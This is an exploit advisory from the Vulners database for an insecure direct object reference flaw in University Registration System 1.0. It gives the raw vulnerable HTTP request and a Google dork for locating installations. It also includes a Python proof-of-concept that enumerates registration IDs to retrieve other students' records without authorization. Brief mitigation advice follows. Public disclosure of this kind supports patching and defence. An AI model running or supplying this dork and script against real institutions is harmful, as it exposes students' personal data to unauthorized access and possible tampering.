Vulners
Lucene search
University Registration System 1.0 Insecure Direct Object Reference
# Exploit Title: University Registration System - IDOR Leads to Information Disclosure
# Date: 2025-03-25
# Exploit Author: wa0_3/td9_l
# Telegram: @wa0_3/@td9_l
# Vendor Homepage: https://informatique-eg.com/
# Version: 1.0
# Tested on: https://demo.informatique-eg.com/
# Category: WebApps
# CVE: N/A
## Description:
An Insecure Direct Object Reference (IDOR) vulnerability was discovered in the University Registration System, allowing unauthorized users to access and modify registration details of other students by manipulating the `paramPgregistrationId` parameter.
## Vulnerable Endpoint:
```
GET Registration/PG/PG_Register.aspx?paramPgregistrationId=(id) HTTP/1.1
Host: target-university.edu
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: ASP.NET_SessionId=gky2cc33uoduykncb5mrz5e3
Connection: keep-alive
```
## Google Dork:
```
inurl:Registration/PG/PG_Register.aspx
```
## Proof of Concept (PoC):
```python
import argparse
import requests
parser = argparse.ArgumentParser(description='Exploit IDOR in University Registration System')
parser.add_argument('-url', help='Target URL (e.g., http://example.com)', required=True)
parser.add_argument('-id', help='Target Registration ID', required=True)
args = parser.parse_args()
url = f"{args.url}Registration/PG/PG_Register.aspx?paramPgregistrationId={args.id}"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "keep-alive"
}
response = requests.get(url, headers=headers)
if response.status_code == 200:
print("[+] Exploit Successful!")
print("[+] Response:")
print(response.text)
else:
print("[-] Exploit Failed")
```
## Impact:
An attacker can enumerate `paramPgregistrationId` values to view and potentially modify sensitive student registration details without authentication.
## Mitigation:
- Implement proper access control checks to ensure only authorized users can access their own data.
- Use session-based authentication to verify user privileges before serving sensitive data.
- Implement rate limiting and monitoring to detect abnormal access patterns.
## Credits:
Discovered by **wa0_3** (@wa0_3)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Mar 2025 00:00Current
6.9Medium risk
Vulners AI Score6.9